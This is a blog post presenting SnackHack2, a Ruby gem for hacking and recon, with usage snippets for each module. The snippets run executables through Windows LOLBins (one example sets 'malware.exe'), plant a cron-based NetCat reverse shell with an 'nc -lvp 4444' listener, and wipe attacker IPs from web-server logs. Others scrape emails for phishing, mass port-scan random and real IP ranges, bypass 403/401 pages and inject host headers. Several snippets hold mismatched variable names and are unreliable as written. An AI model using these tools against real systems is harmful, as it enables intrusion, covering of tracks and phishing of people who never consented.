Michael Meade

The snackhack2 logo

SnackHack2: Hacking tool and Recon

by

Michael Meade
in , , ,

This tool comes in gem form and can also be downloaded from Github.com. Originally, this project would be my senior project, but I had to scrape the idea for a simpler project due to my course workload and mental health.

Please check out my other article about this tool, the article name is SnackHack2: Scripts which takes the SnackHack2 program and shows examples of possible user cases.

To install the gem run the command below.

gem install snackhack2

Check out useful scripts in action here & the tests here.

Indirect Command Injection

This code when ran, will create a pop-up with the title “CLICK ME”. The prompt will show the word “test”. This could be used to get the target to run a command or program. Of course, the prompt and title can be changed to anything.

cj = Snackhack2::CommandInjection.new
cj.prompt = "test"
ck.title = "CLICK ME"
cj.wlrmdr_With_prompt

As the name might apply, the code has the same function as the code above but without the prompt. By default it will run “calc.exe” but this can be changed as seen below.

cj = Snackhack2::CommandInjection.new
cj.exe = "runme.exe"
cj.wlrmdr_without_prompt

Conhost

Conhost.exe is a LOLBin that can be used to execute commands. By default, it will execute “calc.exe”

cj = Snackhack2::CommandInjection.new
cj.exe = "malware.exe"
cj.conhost


## This will run the same thing but the window will be hidden. 
cj.conhost_hide

SSH.exe to execute command

A black outline of a computer with the words "SSH" near the top of the screen.

Like before by default, the code below will run “calc.exe”. This can be changed to anything. 

cj = Snackhack2::CommandInjection.new

cj.exe = "runme.exe"
cj.ssh

LolBin MSR.exe Recording Screen

The code below uses a feature built-in to windows to record the screen. It will save the screenshots to a file named “screenshots.zip” by default. Again, this can be easily changed. By default, it will record 60 seconds, but this can also be changed as seen below. 

ss = Snackhack2::ScreenShot.new
ss.time = 64
ss.run

IP Lookup

IP stands for Internet Protocol. Every computer and website has one. This feature uses nslookup and Ping to find the IP of the site. This technique can be used by hackers at the recon stage of an attack. 

i = Snackhack2::IpLookup.new("https://x.com")
i.run

Extract Emails from Website

A blue envelope with the @ sign in a piece of paper.
An image of a blue envelope.

A hacker or pen tester needs to find targets, one way of acquiring emails is using a spider to crawl a site to scrape all the emails that could be used for phishing. By default the max_depth is 2, of course, this can be changed like the example below.

This is another way for a threat actor or hacker to perform recon on a target. With the users email they could try to phish them. get them to install malware.

e = Snackhack2::Email.new("https://www.tupeloschools.com/leadership/staff-directory")
e.run

# set @max_depth to two
e.max_depth = 2
puts e.max_depth

Web Server log cleaner

This code will search web server logs for the given IP and replace the IP with a randomly generated IP.

This is helpful for post-exploitation if a hacker or pen tester wants to remove any traces of scanning the web server or how they exploited a vulnerability in the web site.

w = Snackhack2::WebServerCleaner.new('8.1.9.2')
w.run

WordPress

A hacker in black hoodie with a computer that has the WordPress logo on the computer.
A hacker targeting WordPress!

WordPress is another Content Management System. This function of the code works similar to how the Drupal score system works. The code tries to see if the site is built by WordPress.

The higher the score the more likely that the site is built using WordPress. Every time that the code detects it might be WordPress, it will add 10 to the score. There currently are 7 elements in the array that the code uses to determine if it is a WordPress site.

require "snackhack2"
w=Snackhack2::WordPress.new("https://kinsta.com)
w.run

Some of the features the code has is that will try to detect how many users there are and their usernames, see if there is any open directories. During the recon stage of an attack the threat actor must find out what software and versions the web server are running so that they can look to see if any of them are vulnerable.

Examples of other possible scripts can be found here.

Reverse Shell

Will print out the command to run and will set a cron job that will run every minute that will use NetCat to connect to the server.

l = Snackhack2::ReverseShell.new("6.1.9.1", "9")
l.run

This will use bash.exe to connect to a reverse shell. On the remote computer run: “nc -lvp 4444“. After running the code below the computer will connect to the remote server, giving the threat actor remote control of the computer.

This is all done by Living of the Land, without any third-party tools, just the features built into Windows.

This is favored by threat actors since they do not need to install any malware that could be detected and removed.

r = Snackhack2::ReverseShell.new("1.1.1.1", "4")
r.bash

## Version 2 of bash
r.version2

List Users

A bunch of users in a circle
Users on the system

Search for Users on Windows. After Hacking the victim, the threat actor might want to gather up the usernames of the people using the computer. This feature will help you gather that information!

lu = Snackhack2::ListUsers.new
lu.user = "admin"
lu.windows_search_user

List users on Linux-based systems by viewing the “/etc/passwd” file. 

lu = Snackhack2::ListUsers.new
lu.linux

The code below will list all the users on a Windows-based system. 

lu = Snackhack2::ListUsers.new
lu.windows

After the code below is ran, it will determine if the Operating System is Windows or Linux and run the correct code that will list the users. 

lu = Snackhack2::ListUsers.new
lu.auto

Gathering Google Analytics

Uses a handful of different regexs to extract the Google Analytics code from a site. 

ga = Snackhack2::GoogleAnalytics.new
ga.site = "https://abc.com"
ga.run

Scrapping The Top Sites

require_relative '../lib/snackHack2'
ga = Snackhack2::GoogleAnalytics.new
File.readlines("top-1000000-domains.txt").each do |site|
	site = site.strip
	ga.site = "https://#{site}"
	begin
		g = ga.run.shift
	rescue
	end
	unless g.eql?(nil)
		unless g.include?("[+] No Google Analytics found :(")
			p g
			puts site

			File.open("top_gas.txt", 'a') { |file| file.write("#{g}:#{site}\n") }
		end
	end
end

The top sites list can be found here.

Getting a Site’s SSL Cert Hash

This piece of code will get the site SSL cert hash. 

ssl =  Snackhack2::SSLCert.new
ssl.site = "https://google.com"
ssl.get_cert

Getting A Site’s Meta Data

Most sites have meta tag that describes the site. It is used for SEO to get better ranked on Google with relevant search results. 

meta = Snackhack2::WebsiteMeta.new
meta.site = "https://abc.com"
meta.run

puts "[+] Getting a website's META descriptio\n".red
meta.description

Bypassing 403 & 401

This code performs a bunch of little tricks that will hopefully be able to bypass the pages. This might take a while because it uses a list of web paths.

ph = Snackhack2::BypassHTTP.new
ph.site = "https://example.com"
ph.dots

ph = Snackhack2::BypassHTTP.new
ph.site = "https://example.com"
ph.basic

ph = Snackhack2::BypassHTTP.new
ph.site = "https://example.com"
ph.uppercase

ph = Snackhack2::BypassHTTP.new
ph.site = "https://example.com"
ph.url_encode

Extract Crypto Addresses

  • Monero
  • Bitcoin
  • Litecoin
  • Dash
  • Stellar
  • Ethereum
  • Bitcoin Cash
  • Dogecoin
c = Snackhack2::CryptoExtractWebsite.new("https://coincarp.com/currencies/tron/richlist/")
puts ca.save_file
ca.save_file = false
puts ca.save_file
ca.run

ca.monero
ca.bitcoin
ca.litecoin
ca.dash
ca.stellar
ca.ethereum
ca.bitcoincash
ca.dogecoin

SiteMap XML

s = Snackhack2::SiteMap.new("https://x.com")
sm.run

Port Scan

The images shows a port scanner
Port Scanner Icon.

The SnackHack2 code will run a port scan on the given IP and display the results in the terminal.

A port scanner can be used to perform recon on a target machine. It will find open, closed or filtered ports.

tcp = Snackhack2::PortScan.new
tcp = "167.71.98.134"
tcp.run

The code below will generate 100 random IPs and perform a port scan on all the generated IPs. 

require 'snackhack2'

tcp = Snackhack2::PortScan.new
tcp.count = 100
tcp.mass_scan

This code below will perform a port scan like the other pieces of code but it will only extract or show a certain port, in the case of the example below it will only show port 22. Port 22 is often used by SSH services. 

require './lib/snackHack2'

for i in 0..255
  puts "167.71.98.#{i}"
  tcp = Snackhack2::PortScan.new
  tcp.ip = "167.71.98.#{i}"
  tcp.run
  i += 1
  print("\n\n")
end
tcp.delete = true
tcp.ports_extractor("22")

DNS

The words DNS with a bunch of gears around it with a blue background.

This code below will run a couple different things such as a port scan, a DNS lookup and a IP lookup. It will get all the DNS IPs for utica.edu, save them in an array named ips. Finally it will run a port scan on the IPs collected by dns function. 

require './lib/snackHack2'

ps   = Snackhack2::PortScan.new
dns  = Snackhack2::Dns.new
ip   = Snackhack2::IpLookup.new 

ips  = []


dns.site  = "utica.edu"
ns        = dns.nameserver
ns.each do |i|
 ip.site = i
 ips << ip.get_ip.shift
end

ips.each do |ii|
 ps.ip = ii.to_s
 ps.run
end

AAA

Get a site’s AAA records. 

dns = Snackhack2::Dns.new
dns.site = "abc.com"
puts "AAAA: "
dns.aaaa.each do |s|
	puts s
end

A 

dns = Snackhack2::Dns.new
dns.site = "abc.com"
puts "A Record: "
dns.a.each do |a|
	puts a
end

Nameserver

dns = Snackhack2::Dns.new
dns.site = "abc.com"

puts "NamerServer: "
dns.nameserver.each do |ns|
	puts ns
end

SOA 

dns = Snackhack2::Dns.new
dns.site = "abc.com"
puts "SOA: "
dns.soa.each do |s|
	puts s
end

TXT

dns = Snackhack2::Dns.new
dns.site = "abc.com"
puts "TXT: "
dns.txt.each do |s|
	puts s
end

hinfo

dns = Snackhack2::Dns.new
dns.site = "abc.com"
puts "hinfo: "

dns.hinfo.each do |s|
	puts s
end

MX

dns = Snackhack2::Dns.new
dns.site = "abc.com"
puts "MX: "
dns.mx.each do |s|
	puts s
end

Extract Comments From Code

require '../lib/snackHack2'

rc = Snackhack2::RubyComments.new
rc.file = "test_comments.txt"
rc.comments
rc.comment_block


puts "[+] Getting HTML comments\n".red
c = Snackhack2::Comments.new
c.site = "https://abc.com"
c.run

Host Injection

hi = Snackhack2::HostInjection.new

hi.site = "http://127.0.0.1:4567/admin"
hi.old_host_ip = "172.28.170.34"
hi.new_host_ip = "192.168.1.100"

hi.host_ip
hi.double_host_ip
hi.x_forwarded

WordPress – Yoast SEO

ww = Snackhack2::WordPress.new
ww.site = "https://www.caicorp.com"
ww.yoast_seo(print_version: true)
puts ww.yoast_seo

Get Robots.txt

url = "https://abc.com"
r = Snackhack2::Robots.new(url)
r.run

Disallow

url = "https://abc.com"
r = Snackhack2::Robots.new(url)
r.disallow_robots.each do |da|
  puts da
end

Allowed

url = "https://abc.com"
r = Snackhack2::Robots.new(url)
r.allow_robots.each do |da|
  puts da
end

require_relative '../lib/snackHack2'

bg = Snackhack2::BannerGrabber.new
bg.site = "100.33.33.33"

# uses tcp socket
#bg.get_tcp_info

bg.site = "https://abc.com"

# Get if server is using nginx...
puts "[+] Testing if site is using nginx... [+]"
bg.nginx
puts "\n\n\n{=============================================}\n\n\n"
# Using cURL to get headers
puts "[+] Using cURL to get the site's headers [+]"
bg.curl
puts "\n\n\n{=============================================}\n\n\n"

# Check if server is using apache
puts "[+] Testing if site is using Apache2... [+]"
bg.apache2

puts "\n\n\n{=============================================}\n\n\n"

# Check if server is running wordpress...
puts "[+] Testing if site is using wordpress... [+]"
bg.site = "https://krebsonsecurity.com"

bg.wordpress


# Checking for cloudflare headers
puts "[+] Checking for cloudflare headers! [+]\n\n\n"

bg.cloudflare

puts "\n\n\n{=============================================}\n\n\n"

# checking for cloudflare headers w/o printing them
puts "[+] Checking for cloudflare headers w/o printing [+]\n\n\n"
bg.site = "https://abc.com"
p bg.cloudflare(print_status: false)

puts "\n\n\n{=============================================}\n\n\n"

# Checking for cloudfront in the headers
puts "\n\n\n[+] Checking for cloudfront headers [+]\n\n\n"
bg.cloudfront

puts "\n\n\n{=============================================}\n\n\n"

# checking for cloudfront headers  w/o printing
# It will return the results in an array.
puts "\n\n\n[+] Checking for cloudfront headers w/o printing [+]\n\n\n"
p bg.cloudfront(print_status: false)

puts "\n\n\n{=============================================}\n\n\n"

# Detect the headers of the site it will return the hash
# by default 
puts "\n\n\n[+] Detecting headers with returning it [+]\n\n\n"
p bg.detect_header

puts "\n\n\n{=============================================}\n\n\n"

# Detect the headers will print out the headers
puts "\n\n\n[+] Checking for cloudfront headers with printing it [+]\n\n\n"

bg.detect_header(return_status: false)